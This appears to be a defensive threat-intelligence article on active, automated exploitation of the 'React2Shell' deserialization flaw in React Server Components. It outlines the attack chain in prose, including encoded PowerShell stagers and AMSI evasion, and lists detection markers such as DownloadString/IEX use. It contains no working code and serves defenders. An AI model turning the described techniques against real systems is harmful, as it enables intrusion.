React2Shell RCE: Active Exploitation of Unsafe Deserialization in Server Components

The Industrialization of Exploitation

What strikes me most about the telemetry from researchers at GreyNoise is the speed and automation of these attacks. We aren’t seeing manual, tentative poking at firewalls here. Instead, the data reveals a highly automated, opportunistic campaign. Attackers are leveraging botnets—including evolutions of the notorious Mirai—to scan for this vulnerability at scale. The traffic patterns are distinctively non-organic; the fingerprints of the TCP stacks and HTTP clients scream “automation” rather than human browsing.

Deconstructing the Attack Chain

The exploitation chain observed in the field typically begins with unauthenticated probes against the Flight protocol surface, followed by small proof-of-execution commands. Successful probes are followed by encoded PowerShell stagers, which commonly use reflection and AMSI-evasion primitives. Network telemetry often shows requests from diverse ASNs and IPs concentrated in several regions, and telemetry platform signatures include Go-http-client and various scanner user agent strings. On endpoints, defenders should prioritize detection of PowerShell process creation with encoded command arguments, unusual use of DownloadString/IEX, and script blocks containing AMSI-bypass markers.

Practical mitigation and response priorities

Organizations running React Server Components or frameworks that consume them must treat this vulnerability as high priority. The primary steps are straightforward: apply vendor patches or mitigations for the Flight protocol, restrict public exposure of server component endpoints where possible, and harden detection and containment controls. On the detection side, blocklists that target the campaign’s observed IPs and JA3/JA4 fingerprints can reduce noisy exploitation attempts, while endpoint telemetry should be tuned to flag the characteristic PowerShell validation and encoded-stager activity described above. Incident responders should also be prepared to triage signs of post-exploitation activity commonly associated with automated botnets and commodity toolkits.

Monitoring and threat intelligence recommendations

Continuous monitoring of server logs for unusual POSTs against server component endpoints, rapid repeat attempts with arithmetic-style commands, and spikes in small deterministic responses are useful early indicators. Enriching alerts with ASN and user-agent fingerprinting, and integrating threat feeds that capture the campaign’s IP infrastructure, will improve automated blocking and analyst triage. Because attackers have been observed integrating exploit code into botnet toolsets, defenders should assume opportunistic re-use across varying threat actors and prepare for follow-on lateralization attempts if a host is compromised.

Final thoughts

I view React2Shell as a clear example of how modern web-framework features can expand an application’s attack surface when unsafe deserialization is present. The exploitation activity is opportunistic and automated, which means the risk grows quickly for internet-exposed services that lag on updates. Organizations should assume that simple, reproducible probes will appear in their logs and prioritize patching, exposure reduction, and detection rules that focus on the small, telltale PowerShell validations and encoded stagers seen in the wild. Treating this as an urgent operational task will materially reduce the likelihood of successful compromise.